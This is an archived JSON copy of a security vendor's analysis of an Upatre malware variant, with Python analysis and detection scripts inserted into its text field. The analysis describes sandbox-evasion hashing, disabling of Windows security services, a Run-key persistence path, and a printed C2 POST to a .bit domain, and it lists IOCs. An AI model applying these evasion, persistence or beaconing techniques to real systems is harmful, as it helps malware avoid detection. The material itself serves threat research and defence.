{
	"id": "9e4e2fbb-894e-4e08-9bff-b7a6504f24f4",
	"created_at": "2026-04-06T00:11:53.538455Z",
	"updated_at": "2026-04-10T03:20:38.581597Z",
	"deleted_at": null,
	"sha1_hash": "55351d7aa674d176ad0bfddd737007d177d32550",
	"title": "Upatre Continued to Evolve with new Anti-Analysis Techniques",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2589458,
	"plain_text": "Upatre Continued to Evolve with new Anti-Analysis Techniques\r\nBy Mike Harbison, Brittany Barbehenn\r\nPublished: 2018-07-13 · Archived: 2026-04-05 12:39:39 UTC\r\nFirst discovered in 2013, Upatre is primarily a downloader responsible for delivering additional trojans onto\r\nthe victim host. It is best known for its ties to the Dyre banking trojan, peaking at over 250,000\r\nUpatre infections per month delivering Dyre in July 2015. In November 2015, however, an organization\r\nthought to be associated with the Dyre operation was raided, and the use of Upatre to deliver\r\nDyre subsequently dropped dramatically, to fewer than 600 infections per month by January 2016.\r\nToday, the Upatre downloader is effectively no longer in use by criminal organizations. However, one of the\r\nmany interesting aspects of Upatre had always been its constantly adaptive nature: the developers\r\ncontinuously added features and capabilities to increase its efficacy.\r\nIn March 2018, Unit 42 researchers collected a sample of Upatre that was compiled in December 2016 but at\r\nthe time was still largely undetected by most automated detection systems. Because of this, we analyzed the sample\r\nto raise awareness among those interested in this malware and its evolution. This previously undocumented variant\r\nfeatures significant code-flow obfuscation, decrypt-on-demand handling of its network communication strings (each\r\ndomain is decrypted only at the point of use), and, of particular interest, the method by which this variant detects\r\nthat it is running inside a virtual machine in order to evade analysis.\r\nIn this post we highlight the techniques identified during our analysis.\r\nMalware Overview\r\nUpatre is stage-0 malware, which means it is a downloader. The malware is used to download and\r\ninstall a payload onto the affected system. The payload is retrieved from hardcoded domain(s) and is typically\r\nanother piece of malware.
Historically, Upatre has acted as a downloader for malware families such as Dyre,\r\nGameOver Zeus, Kegotip, Locky, and Dridex, to name a few. In this case, however, no payload was delivered.\r\nAdditionally, variants such as this one collect information from the target and transmit the data via an HTTP\r\nPOST request.\r\nThis newly observed variant comes packed with several characteristics and capabilities that stood out to us during\r\nanalysis. Attributes in the PE header suggest that the malware is written in Visual C++, and several of the PE\r\nsections have high entropy, which indicates that the binary is packed. The PE resource section also\r\ncontains Google Chrome images, so when the binary is placed on the target machine it appears to be the\r\nGoogle Chrome web browser.\r\nOne of the key features of this variant that stood out during our analysis is how it detects whether or not it is\r\nrunning within a virtual machine. Although virtual machine detection is anything but new, this variant\r\nhandles it a bit differently than other samples previously analyzed by Unit 42. To evade analysis, the newly\r\nobserved variant enumerates the running processes on the host, computes a CRC32 hash of each process name,\r\nXORs it with the hard-coded key 0x0F27DC411 (assembler notation for the 32-bit value 0xF27DC411),\r\nand finally compares the resulting value against a list of values stored in an array within the code. Because the\r\nstored values are hashes rather than plaintext names, the blocklist cannot be read off the binary with a strings\r\ntool; recovering the names requires hashing candidate process names and looking for matches.\r\n
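The process-name check described above, written out in Python as an added example (this is not code from the original post or from the sample itself): it applies CRC32 to a process name, XORs in the key, tests membership in the table of 25 published values, and then runs a wordlist attack to recover names from the hashes. The CRC-32 flavour (standard zlib/IEEE) and the way the name is normalised before hashing are assumptions of this example, since the post does not state them; the candidate wordlist is constructed.

```python
import zlib

# Key XORed into every CRC32 by the sample. The post prints it as 0x0F27DC411,
# MASM-style with a leading zero; as a 32-bit value it is 0xF27DC411.
XOR_KEY = 0xF27DC411

# The 25 array entries reported in the post (already XORed with the key).
PUBLISHED_TABLE = frozenset([
    0x6BA08023, 0xDFF859A5, 0x9649C9DF, 0x91B88065, 0xF663B61C,
    0xC6E1589A, 0xC63B2FDF, 0xA9D475EF, 0xCE9F7AE2, 0xCF3B343A,
    0x85D3D4E6, 0x01392D4C, 0xDFC3A97E, 0x51ACC655, 0xEF0F2980,
    0x64EEAFAF, 0xD5F11B49, 0xC9823C94, 0x9F4EE7C8, 0x403C2A93,
    0x6A50A975, 0xECCCD158, 0xED3CF80E, 0x209202D5, 0x2C6668C3,
])

# Constructed wordlist of VM-tool and analysis-tool process names to try.
CANDIDATES = [
    'vmtoolsd.exe', 'vmacthlp.exe', 'vmwaretray.exe', 'vmwareuser.exe',
    'vboxservice.exe', 'vboxtray.exe', 'python.exe', 'procmon.exe',
    'procexp.exe', 'wireshark.exe', 'ollydbg.exe', 'x32dbg.exe', 'idaq.exe',
    'windbg.exe', 'fiddler.exe', 'regshot.exe', 'sandboxiedcomlaunch.exe',
]


def encode_name(raw_name, key=XOR_KEY):
    # Assumption: standard zlib/IEEE CRC-32. A table-driven variant lifted
    # from the binary would drop in here if the recovery below finds nothing.
    return (zlib.crc32(raw_name) & 0xFFFFFFFF) ^ key


def name_variants(name):
    # The post does not say how the name is normalised before hashing, so the
    # plausible encodings (as-is, lower, upper; ANSI and UTF-16LE) are all tried.
    for text in (name, name.lower(), name.upper()):
        yield text.encode('ascii')
        yield text.encode('utf-16-le')


def is_blocked(process_name, table, key=XOR_KEY):
    # The sample's own test: CRC32(name) ^ key, then array membership.
    return encode_name(process_name.encode('ascii'), key) in table


def analysis_environment_detected(table, running_processes, key=XOR_KEY):
    # Any hit means the sample sends no HTTP POST; the real binary then sleeps
    # six seconds and re-runs the whole enumeration, looping on an analysis host.
    return any(is_blocked(p, table, key) for p in running_processes)


def recover_names(table, candidates, key=XOR_KEY):
    # Dictionary attack on the hashed blocklist: hash each candidate under
    # every variant and keep the ones that land in the table.
    found = {}
    for name in candidates:
        for raw in name_variants(name):
            value = encode_name(raw, key)
            if value in table and value not in found:
                found[value] = name
    return found


if __name__ == '__main__':
    hits = recover_names(PUBLISHED_TABLE, CANDIDATES)
    for value, name in sorted(hits.items()):
        print(hex(value), name)
    print(len(PUBLISHED_TABLE) - len(hits), 'entries still unknown')
```

Run it as a script to see which of the published entries a given wordlist explains. If none of the three names the post recovered (vmtoolsd.exe, vmacthlp.exe, Python.exe) lands in the table under any variant, the sample is using a non-standard CRC table or a different normalisation, and the routine should be lifted from the binary and substituted into encode_name; the rest of the attack is unchanged.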
We observed the following values:\r\n0x6BA08023 0xDFF859A5 0x9649C9DF 0x91B88065 0xF663B61C\r\n0xC6E1589A 0xC63B2FDF 0xA9D475EF 0xCE9F7AE2 0xCF3B343A\r\n0x85D3D4E6 0x01392D4C 0xDFC3A97E 0x51ACC655 0xEF0F2980\r\n0x64EEAFAF 0xD5F11B49 0xC9823C94 0x9F4EE7C8 0x403C2A93\r\n0x6A50A975 0xECCCD158 0xED3CF80E 0x209202D5 0x2C6668C3\r\nhttps://unit42.paloaltonetworks.com/unit42-upatre-continues-evolve-new-anti-analysis-techniques/\r\nPage 1 of 9\n\nThis version of Upatre will not transmit any data via HTTP POST to any of the target domains if one of these\r\nvalues is found. Instead, the malware sleeps for six seconds and then restarts the entire check from the beginning,\r\nso on a host running one of the listed tools it loops indefinitely without ever contacting its C2.\r\nWe were unable to determine every process name corresponding to the list above; however, we were\r\nable to decipher the following:\r\nProcess Name    Stored value (CRC32 XOR key)\r\nvmtoolsd.exe    0xD5F11B49\r\nvmacthlp.exe    0x403C2A93\r\nPython.exe      0x209202D5\r\nOther notable functionality of this new version of the Upatre malware includes:\r\nIn-memory loading of code\r\nDisables the following Windows services:\r\nWindows Security Center\r\nInternet Connection Sharing\r\nWindows Firewall\r\nWindows Defender\r\nWindows Update\r\nWindows Defender Network Inspection Service\r\nDisables Windows security notification balloons on Windows 7 and up\r\nDisables the Internet Explorer Phishing Filter\r\nDisables Windows User Account Control (UAC) notifications\r\nLaunches the trusted Windows application msiexec.exe and injects code into its memory space using an\r\nundocumented technique\r\nHeavy use of obfuscated and optimized code to thwart code analysis\r\nUse of non-essential Windows APIs for stack pivoting to mask the intended API\r\nMultiple layers of custom encoding used to decode individual strings.
Each encoded string uses its own decoding routine, which is not shared\r\nwith the other encoded values\r\nNetwork Communication\r\nAnother feature of this sample is its use of the .bit top-level domain (TLD). The intended domains are encrypted\r\nand only decrypted when the malware is ready to use them. This sample attempts to resolve two domains,\r\nbookreader[.]bit and doghunter[.]bit, via the following hardcoded DNS servers:\r\n31.3.135[.]232\r\n193.183.98[.]154\r\n5.135.183[.]146\r\n84.201.32[.]108\r\n185.133.72[.]100\r\n96.90.175[.]167\r\n104.238.186[.]189\r\nDNS resolution for the .bit domains uses these hardcoded DNS servers and is carried over TCP rather than the\r\nusual UDP. Hardcoded resolvers are necessary because .bit domains are based on Namecoin and are not part of the ICANN\r\nroot, so a host's normal resolver cannot answer for them. Additionally, the hardcoded DNS server IPs we identified in this\r\nsample are all associated with OpenNIC public DNS servers.\r\nAccording to OpenNIC, when using OpenNIC DNS servers, .bit domains are resolved through centralized servers\r\nthat generate a DNS zone from the Namecoin blockchain; the decentralized nature of Namecoin as a naming system is\r\ntherefore not actually being used here, and those resolvers remain an ordinary, blockable network chokepoint.\r\nIf domain resolution is successful, the malware then performs an HTTP POST request similar to the following:\r\nPOST / HTTP/1.0\r\nHost: bookreader[.]bit\r\nContent-Length: 1024\r\n[1,024 bytes of encrypted binary body; unprintable and not reproduced here]\r\nNote that the HTTP POST does not contain a User-Agent header, which is itself unusual for a browser and a\r\nuseful signature in proxy logs.\r\nAt this time, we don't fully understand the encryption method; however, we know that the data sent in the POST\r\nrequest is encrypted using a custom algorithm. Below is an example of the data captured prior to\r\nencryption. The computer name (WIN-RI88L8VME8M_), a 16-character hexadecimal identifier, and a UTF-16LE\r\nWindows path under C:\\Windows\\system32 are visible in plaintext. The 0xAB and 0xFEEE runs are the Windows\r\ndebug-heap fill patterns for allocation guard bytes and freed memory, which is consistent with the capture having\r\nbeen taken under a debugger and with the 1,024-byte buffer not being fully initialized before it is sent:\r\n00000000   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................\r\n00000010   00 00 00 00 60 00 00 00  00 00 00 00 01 00 00 00   ....`...........\r\n00000020   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00   ................\r\n00000030   11 27 00 00 00 00 00 00  20 00 00 00 20 00 00 00   .'...... ... ...\r\n00000040   57 49 4E 2D 52 49 38 38  4C 38 56 4D 45 38 4D 5F   WIN-RI88L8VME8M_\r\n00000050   45 35 33 32 36 34 38 41  37 36 31 46 34 43 35 41   E532648A761F4C5A\r\n00000060   AB AB AB AB AB AB AB AB  00 00 00 00 00 00 00 00   ««««««««........\r\n00000070   8B BB 9F 39 09 63 00 00  30 28 31 00 08 21 31 00   ‹»Ÿ9.c..0(1..!1.\r\n00000080   EE FE EE FE EE FE EE FE  EE FE EE FE EE FE EE FE   îþîþîþîþîþîþîþîþ\r\n00000090   EE FE EE FE EE FE EE FE  EE FE EE FE EE FE EE FE   îþîþîþîþîþîþîþîþ\r\n000000A0   9F BB 9C 2E 00 63 00 18  70 1B 31 00 60 21 31 00   Ÿ»œ..c..p.1.`!1.\r\n000000B0   78 1B 31 00 68 21 31 00  70 21 31 00 80 CF 2B 00   x.1.h!1.p!1.€Ï+.\r\n000000C0   00 00 1D 74 8D 12 1D 74  00 70 00 00 3C 00 3E 00   ...t...t.p..\u003c.\u003e.\r\n000000D0   38 20 31 00 14 00 16 00  60 20 31 00 04 40 0C 00   8 1.....` 1..@..\r\n000000E0   01 00 00 00 B0 A6 BA 77  BC 38 28 00 43 DB 5B 4A   ....°¦ºw¼8(.CÛ[J\r\n000000F0   00 00 00 00 00 00 00 00  F8 1F 31 00 F8 1F 31 00   ........ø.1.ø.1.\r\n00000100   00 20 31 00 00 20 31 00  38 23 31 00 90 20 31 00   . 1.. 1.8#1.. 1.\r\n00000110   54 05 B4 77 00 00 D9 3F  D5 8A 48 B8 82 D1 D3 01   T.´w..Ù?ÕŠH¸‚ÑÓ.\r\n00000120   AB AB AB AB AB AB AB AB  00 00 00 00 00 00 00 00   ««««««««........\r\n00000130   86 BB 9C 37 14 63 00 1A  43 00 3A 00 5C 00 57 00   †»œ7.c..C.:.\\.W.\r\n00000140   69 00 6E 00 64 00 6F 00  77 00 73 00 5C 00 73 00   i.n.d.o.w.s.\\.s.\r\n00000150   79 00 73 00 74 00 65 00  6D 00 33 00 32 00 5C 00   y.s.t.e.m.3.2.\\.\r\n00000160   57 00 49 00 4E 00 4E 00  53 00 49 00 2E 00 44 00   W.I.N.N.S.I...D.\r\nObscuring Code Flow\r\nThis version of Upatre contains significantly obfuscated code to increase the difficulty of analysis.
Figure 1 below shows an example API call disassembled in IDA Pro.\r\nFigure 1-IDA Disassembly of API call\r\nFor conventional naming, the function at address 0x00137ED6 has been renamed after the Windows API it wraps,\r\nRegQueryValueEx_0. According to MSDN, RegQueryValueEx takes six parameters; with an ESP-based frame,\r\nthe stack at the call would resemble the following:\r\nFigure 2-Inside Func_RegQueryValueEx_0\r\nIn the above figure, Func_RegQueryValueEx_0 is EBP based and performs the following:\r\nSaves the current stack pointer in EBP\r\nAdjusts the stack pointer by 268 bytes (thwarting stack-frame analysis)\r\nPushes a pointer to the REGKEY string\r\nAfter the call into sub_140CBE, the stack would resemble the following:\r\nFigure 3--Inside Sub_140CBE\r\nFunction Sub_140CBE does the following:\r\nPushes 0x13 on the stack\r\nCalls another function, which ends up jumping into the Windows API GetSystemMetrics\r\n0x13 is the nIndex argument passed to GetSystemMetrics; the post identifies it as SM_CXCURSOR, which returns the\r\nwidth of a cursor in pixels. (Check before relying on this: SM_CXCURSOR is 13 decimal, 0x0D, whereas 0x13 is 19,\r\nSM_MOUSEPRESENT, so either the pushed value or the constant name is off by a radix; it makes no difference to the trick.)
\r\nRetrieving this value has no bearing on the program, as the return value is never used.\r\nThis is how the stack looks after the call to func_GetSystemMetrics:\r\nFigure 4--Inside Func_GetSystemMetrics\r\nSome interesting observations about this function:\r\nA JMP instruction is used rather than a CALL, because a JMP pushes no return address and so leaves the stack untouched.\r\nThe two PUSH instructions push junk values and exist only to pivot the stack, so that the correct return address is\r\non the stack when the API returns.\r\nHere is how the stack looks prior to the jump:\r\nReturn address 0x001414FD is the address of the code that opens and queries the host's registry, and it is the target\r\naddress once the above instructions have executed. The return code flow is as follows:\r\n1. The two junk values pushed on the stack are removed during execution of the GetSystemMetrics\r\nAPI (GetSystemMetrics is a stdcall function with one argument, so it returns with ret 4, which pops two DWORDs).\r\n2. The stack pointer is incremented past 0x13.\r\n3. Address 0x00140CC5 holds a retn instruction.\r\n4. Address 0x001414FD is now at the top of the stack, and the section of the malware that handles\r\nWindows registry enumeration (RegQueryValueEx) is entered.\r\nThis stack pivot is performed entirely to make static analysis of the file more difficult; the end result is still\r\nthat the API executes and the malware accomplishes its task. For the analyst, the practical effect is that static\r\ncross-references from the call site to the real API are broken, while a breakpoint on the API itself under a\r\ndebugger still fires and confirms which API actually runs.\r\nPersistence Technique\r\nTo establish persistence, this new version of Upatre creates the following registry value:\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\\r\nString value--\u003ex$msbuild, where x$ is a random alphabetic character. Note: the name of the binary depends on\r\nthe executable that is running.
The stub program takes the Windows file name of the EXE and prepends a random character to it.\r\nData --\u003eC:\\ProgramData\\MSBuild\\x$exe\r\nThe file x$MSBuild.exe is then copied to the host's C:\\ProgramData\\MSBuild folder. Note that this is the\r\nPolicies\\Explorer\\Run key rather than the more commonly monitored CurrentVersion\\Run key; both are processed at\r\nlogon, so persistence hunting should cover both.\r\nConclusion\r\nIn our data, we have observed over 119,000 unique malware samples that use dot-bit (.bit) domains for C2\r\ninfrastructure, going back as early as 2014. Malware families observed include Necurs, GandCrab, Vobfus, Tofsee, Floxif,\r\nRamnit, and several others.\r\nBecause the C2 domains were down at the time of our analysis, which was unsurprising given the age of\r\nthe sample, we were never able to capture the ultimate payload for this Upatre variant. However, open-source\r\nanalysis identified another sample configured with the same dot-bit domains. That sample,\r\n94a8b4b22dab4171edde5b1bafbf2f17dbe3c3c4c01335c36ba3b6e5d3635b83, was compiled six days after our\r\nUpatre sample and delivered the Chthonic banking trojan via the RIG exploit kit.\r\nAlthough the delivery mechanism was not observed during our analysis, Upatre typically arrives via an email\r\nlink or attachment or through a compromised website.\r\nDefending Against this Threat\r\nThe Upatre malware is constantly changing and is capable of downloading many different malware families,\r\nsome of them destructive. Using threat detection and prevention solutions such as the Palo Alto Networks next-generation\r\nsecurity platform is highly recommended as part of a proactive cyber security strategy. WildFire and\r\nTraps both detect the samples described in this report as malicious.\r\nNot all dot-bit domains are malicious, but organizations should take steps to ensure they can control access to all\r\npotentially malicious domains.\r\n
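As an added example (not code from the post), the following Python shows the detection side of the network behaviour described in this report: it parses a DNS query as carried over TCP (two-byte length prefix) or UDP, flags lookups of any .bit name, and flags port-53 traffic to the resolvers hardcoded in this sample. The record tuple format, the rule names and the sample records are constructed for the example; the resolver list and the two domains come from the post.

```python
import struct

# Resolvers hardcoded in the sample (the post identifies all of them as OpenNIC public servers).
SAMPLE_RESOLVERS = frozenset([
    '31.3.135.232', '193.183.98.154', '5.135.183.146', '84.201.32.108',
    '185.133.72.100', '96.90.175.167', '104.238.186.189',
])

DOTBIT_QUERY = 'dotbit-query'
SAMPLE_RESOLVER = 'sample-resolver'


def build_query(qname, txid=0x1234):
    # Constructed input: a minimal DNS A/IN query in UDP wire format.
    header = struct.pack('>HHHHHH', txid, 0x0100, 1, 0, 0, 0)
    question = b''
    for label in qname.strip('.').split('.'):
        encoded = label.encode('ascii')
        question += bytes([len(encoded)]) + encoded
    question += bytes([0]) + struct.pack('>HH', 1, 1)
    return header + question


def build_tcp_query(qname, txid=0x1234):
    # DNS over TCP prefixes the same message with a 2-byte big-endian length.
    msg = build_query(qname, txid)
    return struct.pack('>H', len(msg)) + msg


def parse_qname(msg):
    # Returns the first question name (lower-cased), or None when the message
    # is truncated, carries no question, or uses compression in the question.
    if len(msg) < 12:
        return None
    qdcount = struct.unpack('>H', msg[4:6])[0]
    if qdcount == 0:
        return None
    pos = 12
    labels = []
    while True:
        if pos >= len(msg):
            return None
        n = msg[pos]
        pos += 1
        if n == 0:
            break
        if n >= 64 or pos + n > len(msg):
            return None
        labels.append(msg[pos:pos + n].decode('ascii', 'replace'))
        pos += n
    return '.'.join(labels).lower()


def parse_tcp_qname(data):
    # Validates the TCP length prefix before handing the message to parse_qname.
    if len(data) < 2:
        return None
    length = struct.unpack('>H', data[:2])[0]
    msg = data[2:2 + length]
    if len(msg) != length:
        return None
    return parse_qname(msg)


def classify(record, resolvers=SAMPLE_RESOLVERS):
    # record = (proto, dst_ip, dst_port, payload); an empty list means nothing tripped.
    proto, dst_ip, dst_port, payload = record
    reasons = []
    if dst_port != 53:
        return reasons
    qname = parse_tcp_qname(payload) if proto == 'tcp' else parse_qname(payload)
    if qname is not None and qname.endswith('.bit'):
        reasons.append(DOTBIT_QUERY)
    if dst_ip in resolvers:
        reasons.append(SAMPLE_RESOLVER)
    return reasons


# Constructed sample of captured connection records.
SAMPLE_RECORDS = [
    ('tcp', '31.3.135.232', 53, build_tcp_query('bookreader.bit')),
    ('tcp', '104.238.186.189', 53, build_tcp_query('doghunter.bit')),
    ('udp', '10.0.0.53', 53, build_query('www.example.com')),
    ('tcp', '10.0.0.53', 443, build_tcp_query('bookreader.bit')),
]


def scan(records, resolvers=SAMPLE_RESOLVERS):
    # Returns (index, reasons) for every record that tripped at least one rule.
    return [(i, classify(r, resolvers)) for i, r in enumerate(records) if classify(r, resolvers)]


if __name__ == '__main__':
    for i, reasons in scan(SAMPLE_RECORDS):
        print(i, SAMPLE_RECORDS[i][:3], reasons)
```

The .bit-name rule is the durable one: the resolver list is specific to this sample, whereas any Namecoin lookup from a corporate host is worth a look regardless of which server answers it. Checking both framings matters because this sample resolves over TCP, which UDP-only DNS logging would miss entirely.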
Blocking outbound access to external DNS servers and re-routing DNS requests to\r\ninternally controlled DNS servers can help protect a network from malware using dot-bit domains resolved through the\r\nNamecoin network. Because this sample talks to its resolvers over TCP port 53, egress rules that cover only UDP/53\r\nwould miss it.\r\nPalo Alto Networks customers remain protected from Upatre and can identify this threat using the Upatre tag in\r\nAutoFocus.\r\nIndicators of compromise associated with this analysis include:\r\nUpatre\r\nSHA256:   8ac7909730269d62efaf898d1a5e87251aadccf4349cd95564ad6a3634ba4ef4\r\nChthonic\r\nSHA256:   94a8b4b22dab4171edde5b1bafbf2f17dbe3c3c4c01335c36ba3b6e5d3635b83\r\nC2s\r\nDomain:   doghunter[.]bit\r\nDomain:   bookreader[.]bit\r\nIP Address:  31.3.135[.]232\r\nIP Address:  193.183.98[.]154\r\nIP Address:  5.135.183[.]146\r\nIP Address:  84.201.32[.]108\r\nIP Address:  185.133.72[.]100\r\nIP Address:  96.90.175[.]167\r\nIP Address:  104.238.186[.]189\r\nUpdated on 7/13/2018 to clarify that the Upatre sample discussed was compiled in 2016 but was newly discovered\r\nin 2018, and to more clearly identify samples with their hashes.\r\nSource: https://unit42.paloaltonetworks.com/unit42-upatre-continues-evolve-new-anti-analysis-techniques/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/unit42-upatre-continues-evolve-new-anti-analysis-techniques/"
	],
	"report_names": [
		"unit42-upatre-continues-evolve-new-anti-analysis-techniques"
	],
	"threat_actors": [],
	"ts_created_at": 1775434313,
	"ts_updated_at": 1775791238,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/55351d7aa674d176ad0bfddd737007d177d32550.pdf",
		"text": "https://archive.orkl.eu/55351d7aa674d176ad0bfddd737007d177d32550.txt",
		"img": "https://archive.orkl.eu/55351d7aa674d176ad0bfddd737007d177d32550.jpg"
	}
}